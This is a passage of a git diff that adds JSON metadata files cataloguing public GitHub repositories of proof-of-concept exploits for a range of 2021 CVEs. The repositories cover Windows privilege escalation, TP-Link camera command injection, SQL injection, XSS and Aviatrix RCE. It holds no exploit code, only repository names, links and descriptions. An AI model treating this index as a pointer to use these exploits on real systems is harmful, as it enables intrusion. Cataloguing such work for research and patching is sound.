+ "name": "CVE-2021-40449-Exploit",
+ "full_name": "KaLendsi\/CVE-2021-40449-Exploit",
+ "owner": {
+ "login": "KaLendsi",
+ "id": 68001644,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68001644?v=4",
+ "html_url": "https:\/\/github.com\/KaLendsi"
+ },
+ "html_url": "https:\/\/github.com\/KaLendsi\/CVE-2021-40449-Exploit",
+ "description": "windows 10 14393 LPE",
+ "fork": false,
+ "created_at": "2021-10-20T09:24:36Z",
+ "updated_at": "2024-06-24T14:24:19Z",
+ "pushed_at": "2021-10-28T03:51:09Z",
+ "stargazers_count": 93,
+ "watchers_count": 93,
+ "has_discussions": false,
+ "forks_count": 46,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 46,
+ "watchers": 93,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 420883668,
+ "name": "CVE-2021-40449",
+ "full_name": "hakivvi\/CVE-2021-40449",
+ "owner": {
+ "login": "hakivvi",
+ "id": 67718634,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67718634?v=4",
+ "html_url": "https:\/\/github.com\/hakivvi"
+ },
+ "html_url": "https:\/\/github.com\/hakivvi\/CVE-2021-40449",
+ "description": "LPE exploit for a UAF in Windows (CVE-2021-40449).",
+ "fork": false,
+ "created_at": "2021-10-25T04:58:49Z",
+ "updated_at": "2024-06-24T14:25:01Z",
+ "pushed_at": "2021-11-05T06:54:10Z",
+ "stargazers_count": 41,
+ "watchers_count": 41,
+ "has_discussions": false,
+ "forks_count": 17,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-40449"
+ ],
+ "visibility": "public",
+ "forks": 17,
+ "watchers": 41,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 425552572,
+ "name": "CVE-2021-40449_poc",
+ "full_name": "Kristal-g\/CVE-2021-40449_poc",
+ "owner": {
+ "login": "Kristal-g",
+ "id": 61376744,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61376744?v=4",
+ "html_url": "https:\/\/github.com\/Kristal-g"
+ },
+ "html_url": "https:\/\/github.com\/Kristal-g\/CVE-2021-40449_poc",
+ "description": "Exploit for CVE-2021-40449",
+ "fork": false,
+ "created_at": "2021-11-07T16:15:19Z",
+ "updated_at": "2024-06-24T14:25:40Z",
+ "pushed_at": "2021-11-07T16:21:20Z",
+ "stargazers_count": 53,
+ "watchers_count": 53,
+ "has_discussions": false,
+ "forks_count": 14,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 14,
+ "watchers": 53,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 427341436,
+ "name": "cve-2021-40449-poc",
+ "full_name": "CppXL\/cve-2021-40449-poc",
+ "owner": {
+ "login": "CppXL",
+ "id": 36043454,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36043454?v=4",
+ "html_url": "https:\/\/github.com\/CppXL"
+ },
+ "html_url": "https:\/\/github.com\/CppXL\/cve-2021-40449-poc",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-11-12T11:49:10Z",
+ "updated_at": "2022-04-13T09:55:40Z",
+ "pushed_at": "2021-11-12T13:28:33Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 461544780,
+ "name": "CVE-2021-40449-NtGdiResetDC-UAF",
+ "full_name": "BL0odz\/CVE-2021-40449-NtGdiResetDC-UAF",
+ "owner": {
+ "login": "BL0odz",
+ "id": 38938632,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38938632?v=4",
+ "html_url": "https:\/\/github.com\/BL0odz"
+ },
+ "html_url": "https:\/\/github.com\/BL0odz\/CVE-2021-40449-NtGdiResetDC-UAF",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-02-20T16:23:26Z",
+ "updated_at": "2023-07-13T21:12:59Z",
+ "pushed_at": "2022-02-20T16:34:32Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 466221042,
+ "name": "voidmap",
+ "full_name": "SamuelTulach\/voidmap",
+ "owner": {
+ "login": "SamuelTulach",
+ "id": 16323119,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16323119?v=4",
+ "html_url": "https:\/\/github.com\/SamuelTulach"
+ },
+ "html_url": "https:\/\/github.com\/SamuelTulach\/voidmap",
+ "description": "Using CVE-2021-40449 to manual map kernel mode driver",
+ "fork": false,
+ "created_at": "2022-03-04T17:55:52Z",
+ "updated_at": "2024-06-12T00:43:19Z",
+ "pushed_at": "2022-03-05T18:34:25Z",
+ "stargazers_count": 99,
+ "watchers_count": 99,
+ "has_discussions": false,
+ "forks_count": 32,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 32,
+ "watchers": 99,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 667239570,
+ "name": "CVE-2021-40449",
+ "full_name": "toanthang1842002\/CVE-2021-40449",
+ "owner": {
+ "login": "toanthang1842002",
+ "id": 75765145,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75765145?v=4",
+ "html_url": "https:\/\/github.com\/toanthang1842002"
+ },
+ "html_url": "https:\/\/github.com\/toanthang1842002\/CVE-2021-40449",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-07-17T04:07:44Z",
+ "updated_at": "2023-07-17T04:09:49Z",
+ "pushed_at": "2023-07-17T04:10:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-4045.json b/2021/CVE-2021-4045.json
new file mode 100644
index 0000000000..e19d6adf5f
--- /dev/null
+++ b/2021/CVE-2021-4045.json
@@ -0,0 +1,102 @@
+[
+ {
+ "id": 428303672,
+ "name": "CVE-2021-4045-PoC",
+ "full_name": "hacefresko\/CVE-2021-4045-PoC",
+ "owner": {
+ "login": "hacefresko",
+ "id": 47251535,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47251535?v=4",
+ "html_url": "https:\/\/github.com\/hacefresko"
+ },
+ "html_url": "https:\/\/github.com\/hacefresko\/CVE-2021-4045-PoC",
+ "description": "Exploit for command injection vulnerability found in uhttpd binary from TP-Link Tapo c200 IP camera",
+ "fork": false,
+ "created_at": "2021-11-15T14:48:14Z",
+ "updated_at": "2024-06-13T21:11:41Z",
+ "pushed_at": "2023-01-01T21:12:20Z",
+ "stargazers_count": 63,
+ "watchers_count": 63,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-4045",
+ "iot",
+ "poc",
+ "security",
+ "wifi-camera"
+ ],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 63,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 549638519,
+ "name": "CVE-2021-4045",
+ "full_name": "jeffbezosispogg\/CVE-2021-4045",
+ "owner": {
+ "login": "jeffbezosispogg",
+ "id": 115220819,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115220819?v=4",
+ "html_url": "https:\/\/github.com\/jeffbezosispogg"
+ },
+ "html_url": "https:\/\/github.com\/jeffbezosispogg\/CVE-2021-4045",
+ "description": "TP-Link Tapo c200 ver <1.1.15 - Remote Code Execution (RCE)",
+ "fork": false,
+ "created_at": "2022-10-11T13:56:15Z",
+ "updated_at": "2022-10-09T01:03:06Z",
+ "pushed_at": "2022-10-08T04:25:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 735840223,
+ "name": "CVE-2021-4045",
+ "full_name": "pl4int3xt\/CVE-2021-4045",
+ "owner": {
+ "login": "pl4int3xt",
+ "id": 62325297,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62325297?v=4",
+ "html_url": "https:\/\/github.com\/pl4int3xt"
+ },
+ "html_url": "https:\/\/github.com\/pl4int3xt\/CVE-2021-4045",
+ "description": "🔐 \"PWNTAPO: Unveiling Command Injection in TP-Link Tapo C200 Cameras (<= v1.1.16 Build 211209)\" 🔓",
+ "fork": false,
+ "created_at": "2023-12-26T08:20:49Z",
+ "updated_at": "2024-06-22T10:21:32Z",
+ "pushed_at": "2023-12-27T13:33:01Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-4045",
+ "hackingtools",
+ "iot"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40492.json b/2021/CVE-2021-40492.json
new file mode 100644
index 0000000000..89dacc2f2a
--- /dev/null
+++ b/2021/CVE-2021-40492.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 402473190,
+ "name": "CVE-2021-40492",
+ "full_name": "5qu1n7\/CVE-2021-40492",
+ "owner": {
+ "login": "5qu1n7",
+ "id": 44474414,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44474414?v=4",
+ "html_url": "https:\/\/github.com\/5qu1n7"
+ },
+ "html_url": "https:\/\/github.com\/5qu1n7\/CVE-2021-40492",
+ "description": "CVE-2021-40492 Gibbon version 22 Reflected Cross Site Scripting (XSS)",
+ "fork": false,
+ "created_at": "2021-09-02T15:33:12Z",
+ "updated_at": "2021-10-06T19:30:40Z",
+ "pushed_at": "2021-09-03T17:47:30Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40512.json b/2021/CVE-2021-40512.json
new file mode 100644
index 0000000000..81615b04a1
--- /dev/null
+++ b/2021/CVE-2021-40512.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 401232280,
+ "name": "CVE-2021-40512",
+ "full_name": "war4uthor\/CVE-2021-40512",
+ "owner": {
+ "login": "war4uthor",
+ "id": 45926018,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45926018?v=4",
+ "html_url": "https:\/\/github.com\/war4uthor"
+ },
+ "html_url": "https:\/\/github.com\/war4uthor\/CVE-2021-40512",
+ "description": "CVE-2021-40512 OSCAR McMaster 19.40~1235 SQL Injection Vulnerability.",
+ "fork": false,
+ "created_at": "2021-08-30T05:57:54Z",
+ "updated_at": "2021-10-26T06:17:49Z",
+ "pushed_at": "2021-09-05T17:19:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40513.json b/2021/CVE-2021-40513.json
new file mode 100644
index 0000000000..3516c15d15
--- /dev/null
+++ b/2021/CVE-2021-40513.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 401232144,
+ "name": "CVE-2021-40513",
+ "full_name": "war4uthor\/CVE-2021-40513",
+ "owner": {
+ "login": "war4uthor",
+ "id": 45926018,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45926018?v=4",
+ "html_url": "https:\/\/github.com\/war4uthor"
+ },
+ "html_url": "https:\/\/github.com\/war4uthor\/CVE-2021-40513",
+ "description": "CVE-2021-40513 OSCAR McMaster 19.40~1235 Reflected Cross Site Scripting Vulnerability.",
+ "fork": false,
+ "created_at": "2021-08-30T05:57:13Z",
+ "updated_at": "2021-10-26T06:16:14Z",
+ "pushed_at": "2021-09-05T17:20:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40514.json b/2021/CVE-2021-40514.json
new file mode 100644
index 0000000000..a13f24ac2b
--- /dev/null
+++ b/2021/CVE-2021-40514.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 401232038,
+ "name": "CVE-2021-40514",
+ "full_name": "war4uthor\/CVE-2021-40514",
+ "owner": {
+ "login": "war4uthor",
+ "id": 45926018,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45926018?v=4",
+ "html_url": "https:\/\/github.com\/war4uthor"
+ },
+ "html_url": "https:\/\/github.com\/war4uthor\/CVE-2021-40514",
+ "description": "CVE-2021-40514 OSCAR McMaster 19.40~1235 Stored Cross Site Scripting Vulnerability.",
+ "fork": false,
+ "created_at": "2021-08-30T05:56:42Z",
+ "updated_at": "2021-10-26T06:17:14Z",
+ "pushed_at": "2021-09-05T17:20:46Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40531.json b/2021/CVE-2021-40531.json
new file mode 100644
index 0000000000..4a18210a2d
--- /dev/null
+++ b/2021/CVE-2021-40531.json
@@ -0,0 +1,36 @@
+[
+ {
+ "id": 429884385,
+ "name": "CVE-2021-40531",
+ "full_name": "jonpalmisc\/CVE-2021-40531",
+ "owner": {
+ "login": "jonpalmisc",
+ "id": 41548458,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41548458?v=4",
+ "html_url": "https:\/\/github.com\/jonpalmisc"
+ },
+ "html_url": "https:\/\/github.com\/jonpalmisc\/CVE-2021-40531",
+ "description": "Quarantine bypass and RCE vulnerability in Sketch (proof-of-concept)",
+ "fork": false,
+ "created_at": "2021-11-19T17:38:34Z",
+ "updated_at": "2023-03-12T19:22:43Z",
+ "pushed_at": "2021-11-22T14:52:04Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "macos",
+ "sketch"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 4
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40539.json b/2021/CVE-2021-40539.json
new file mode 100644
index 0000000000..aaac32c431
--- /dev/null
+++ b/2021/CVE-2021-40539.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 407383795,
+ "name": "CVE-2021-40539",
+ "full_name": "DarkSprings\/CVE-2021-40539",
+ "owner": {
+ "login": "DarkSprings",
+ "id": 90366126,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90366126?v=4",
+ "html_url": "https:\/\/github.com\/DarkSprings"
+ },
+ "html_url": "https:\/\/github.com\/DarkSprings\/CVE-2021-40539",
+ "description": "CVE-2021-40539 POC",
+ "fork": false,
+ "created_at": "2021-09-17T02:51:40Z",
+ "updated_at": "2021-11-09T16:02:02Z",
+ "pushed_at": "2021-09-17T02:56:19Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 424264582,
+ "name": "CVE-2021-40539",
+ "full_name": "synacktiv\/CVE-2021-40539",
+ "owner": {
+ "login": "synacktiv",
+ "id": 50145679,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50145679?v=4",
+ "html_url": "https:\/\/github.com\/synacktiv"
+ },
+ "html_url": "https:\/\/github.com\/synacktiv\/CVE-2021-40539",
+ "description": "Exploitation code for CVE-2021-40539",
+ "fork": false,
+ "created_at": "2021-11-03T14:49:27Z",
+ "updated_at": "2024-05-23T09:16:12Z",
+ "pushed_at": "2021-11-09T11:15:19Z",
+ "stargazers_count": 46,
+ "watchers_count": 46,
+ "has_discussions": false,
+ "forks_count": 20,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 20,
+ "watchers": 46,
+ "score": 0,
+ "subscribers_count": 6
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40822.json b/2021/CVE-2021-40822.json
new file mode 100644
index 0000000000..7dac4fe59b
--- /dev/null
+++ b/2021/CVE-2021-40822.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 493274768,
+ "name": "CVE-2021-40822",
+ "full_name": "phor3nsic\/CVE-2021-40822",
+ "owner": {
+ "login": "phor3nsic",
+ "id": 18534814,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18534814?v=4",
+ "html_url": "https:\/\/github.com\/phor3nsic"
+ },
+ "html_url": "https:\/\/github.com\/phor3nsic\/CVE-2021-40822",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-05-17T13:58:11Z",
+ "updated_at": "2022-05-20T18:23:52Z",
+ "pushed_at": "2022-05-17T18:38:15Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40839.json b/2021/CVE-2021-40839.json
new file mode 100644
index 0000000000..15d6dd0d98
--- /dev/null
+++ b/2021/CVE-2021-40839.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 437816743,
+ "name": "CVE-2021-40839",
+ "full_name": "itlabbet\/CVE-2021-40839",
+ "owner": {
+ "login": "itlabbet",
+ "id": 43929595,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43929595?v=4",
+ "html_url": "https:\/\/github.com\/itlabbet"
+ },
+ "html_url": "https:\/\/github.com\/itlabbet\/CVE-2021-40839",
+ "description": "Dirty Cow kernel exploit without libcrypt dependency",
+ "fork": false,
+ "created_at": "2021-12-13T09:47:22Z",
+ "updated_at": "2022-01-19T21:46:01Z",
+ "pushed_at": "2021-12-13T09:48:46Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40845.json b/2021/CVE-2021-40845.json
new file mode 100644
index 0000000000..76cc6703fe
--- /dev/null
+++ b/2021/CVE-2021-40845.json
@@ -0,0 +1,37 @@
+[
+ {
+ "id": 405041265,
+ "name": "CVE-2021-40845",
+ "full_name": "ricardojoserf\/CVE-2021-40845",
+ "owner": {
+ "login": "ricardojoserf",
+ "id": 11477353,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11477353?v=4",
+ "html_url": "https:\/\/github.com\/ricardojoserf"
+ },
+ "html_url": "https:\/\/github.com\/ricardojoserf\/CVE-2021-40845",
+ "description": "AlphaWeb XE, the embedded web server running on AlphaCom XE, has a vulnerability which allows to upload PHP files leading to RCE once the authentication is successful - https:\/\/ricardojoserf.github.io\/CVE-2021-40845\/",
+ "fork": false,
+ "created_at": "2021-09-10T10:23:55Z",
+ "updated_at": "2023-09-28T11:31:19Z",
+ "pushed_at": "2021-09-11T20:20:37Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "alphaweb",
+ "cve",
+ "exploit",
+ "zenitel"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40859.json b/2021/CVE-2021-40859.json
new file mode 100644
index 0000000000..3e4fd59e32
--- /dev/null
+++ b/2021/CVE-2021-40859.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 442352197,
+ "name": "CVE-2021-40859",
+ "full_name": "dorkerdevil\/CVE-2021-40859",
+ "owner": {
+ "login": "dorkerdevil",
+ "id": 15796745,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15796745?v=4",
+ "html_url": "https:\/\/github.com\/dorkerdevil"
+ },
+ "html_url": "https:\/\/github.com\/dorkerdevil\/CVE-2021-40859",
+ "description": "Auerswald COMpact 8.0B Backdoors exploit",
+ "fork": false,
+ "created_at": "2021-12-28T04:51:58Z",
+ "updated_at": "2023-09-28T11:34:32Z",
+ "pushed_at": "2021-12-28T14:04:33Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 442366243,
+ "name": "CVE-2021-40859",
+ "full_name": "419066074\/CVE-2021-40859",
+ "owner": {
+ "login": "419066074",
+ "id": 18423034,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18423034?v=4",
+ "html_url": "https:\/\/github.com\/419066074"
+ },
+ "html_url": "https:\/\/github.com\/419066074\/CVE-2021-40859",
+ "description": "Auerswald COMpact 8.0B Backdoors exploit",
+ "fork": false,
+ "created_at": "2021-12-28T06:05:42Z",
+ "updated_at": "2024-04-11T19:50:12Z",
+ "pushed_at": "2021-12-28T05:18:01Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 442810426,
+ "name": "CVE-2021-40859",
+ "full_name": "pussycat0x\/CVE-2021-40859",
+ "owner": {
+ "login": "pussycat0x",
+ "id": 65701233,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65701233?v=4",
+ "html_url": "https:\/\/github.com\/pussycat0x"
+ },
+ "html_url": "https:\/\/github.com\/pussycat0x\/CVE-2021-40859",
+ "description": "Auerswald VoIP System Secret Backdoors -PoC",
+ "fork": false,
+ "created_at": "2021-12-29T15:15:38Z",
+ "updated_at": "2024-04-11T19:55:13Z",
+ "pushed_at": "2021-12-29T15:28:39Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40865.json b/2021/CVE-2021-40865.json
new file mode 100644
index 0000000000..72f516b9cc
--- /dev/null
+++ b/2021/CVE-2021-40865.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 432133933,
+ "name": "CVE-2021-40865",
+ "full_name": "hktalent\/CVE-2021-40865",
+ "owner": {
+ "login": "hktalent",
+ "id": 18223385,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18223385?v=4",
+ "html_url": "https:\/\/github.com\/hktalent"
+ },
+ "html_url": "https:\/\/github.com\/hktalent\/CVE-2021-40865",
+ "description": "CVE-2021-40865",
+ "fork": false,
+ "created_at": "2021-11-26T10:09:40Z",
+ "updated_at": "2023-08-12T14:44:59Z",
+ "pushed_at": "2021-11-26T10:10:33Z",
+ "stargazers_count": 13,
+ "watchers_count": 13,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 13,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-40870.json b/2021/CVE-2021-40870.json
new file mode 100644
index 0000000000..49ef2f4510
--- /dev/null
+++ b/2021/CVE-2021-40870.json
@@ -0,0 +1,133 @@
+[
+ {
+ "id": 414527702,
+ "name": "CVE-2021-40870",
+ "full_name": "System00-Security\/CVE-2021-40870",
+ "owner": {
+ "login": "System00-Security",
+ "id": 81620343,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81620343?v=4",
+ "html_url": "https:\/\/github.com\/System00-Security"
+ },
+ "html_url": "https:\/\/github.com\/System00-Security\/CVE-2021-40870",
+ "description": "Unrestricted upload of file with dangerous type in Aviatrix allows an authenticated user to execute arbitrary code",
+ "fork": false,
+ "created_at": "2021-10-07T08:53:19Z",
+ "updated_at": "2021-10-07T14:36:34Z",
+ "pushed_at": "2021-10-07T08:53:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-40870",
+ "poc"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 414694325,
+ "name": "CVE-2021-40870",
+ "full_name": "0xAgun\/CVE-2021-40870",
+ "owner": {
+ "login": "0xAgun",
+ "id": 78228966,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78228966?v=4",
+ "html_url": "https:\/\/github.com\/0xAgun"
+ },
+ "html_url": "https:\/\/github.com\/0xAgun\/CVE-2021-40870",
+ "description": "Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file which allows an unauthenticated user to execute arbitrary code via directory traversal",
+ "fork": false,
+ "created_at": "2021-10-07T17:19:12Z",
+ "updated_at": "2023-10-05T15:20:38Z",
+ "pushed_at": "2021-10-09T06:06:47Z",
+ "stargazers_count": 16,
+ "watchers_count": 16,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-40870",
+ "remote-code-execution"
+ ],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 16,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 414763941,
+ "name": "CVE-2021-40870",
+ "full_name": "orangmuda\/CVE-2021-40870",
+ "owner": {
+ "login": "orangmuda",
+ "id": 91846073,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91846073?v=4",
+ "html_url": "https:\/\/github.com\/orangmuda"
+ },
+ "html_url": "https:\/\/github.com\/orangmuda\/CVE-2021-40870",
+ "description": "Aviatrix allows an authenticated user to execute arbitrary code",
+ "fork": false,
+ "created_at": "2021-10-07T21:34:00Z",
+ "updated_at": "2023-09-28T11:32:09Z",
+ "pushed_at": "2021-10-07T21:36:11Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-40870",
+ "remote-code-execution"
+ ],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 414859029,
+ "name": "CVE-2021-40870",
+ "full_name": "JoyGhoshs\/CVE-2021-40870",
+ "owner": {
+ "login": "JoyGhoshs",
+ "id": 36255129,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36255129?v=4",
+ "html_url": "https:\/\/github.com\/JoyGhoshs"
+ },
+ "html_url": "https:\/\/github.com\/JoyGhoshs\/CVE-2021-40870",
